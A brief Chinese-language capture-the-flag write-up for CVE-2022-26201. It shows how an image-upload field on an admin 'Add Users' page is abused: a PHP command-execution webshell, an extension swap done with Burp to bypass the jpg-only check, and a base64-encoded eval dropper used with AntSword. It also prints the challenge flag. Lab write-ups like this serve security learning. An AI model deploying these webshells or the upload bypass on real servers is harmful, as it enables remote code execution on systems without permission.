CVE-2022-26201

打开是这么个页面

左上角找到Admin访问

里面有个Add Users，访问一下，能创建用户，有个能上传图片的地方

普通的一句话木马无法访问flag，需要创建一个权限马

<?php system($_GET[1]);phpinfo();?>

因为只能上传jpg形式的文件，所以更改文件后缀名为jpg

使用bp抓包，更改后缀为php，使用重放器发送

上传成功

访问img/上传的php文件名 /flag，得到flag：flag{a71683b4-9a2d-4288-b8f3-25d10816b1c0}

第二种方法使用蚁剑马连接

一句话木马是有防护的，所以我们要利用php和base64来构造一个特殊马来进行连接：

base64先对一句话木马加密<?php @eval($_POST['a']);?>

木马内容：

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pOz8+'));

?>

然后跟上边一样bp抓包改包，重放器发送

生成shell.php文件，木马是以base64的形式。

蚁剑路径为img/shell.php，编码器为base6，根目录下找到flag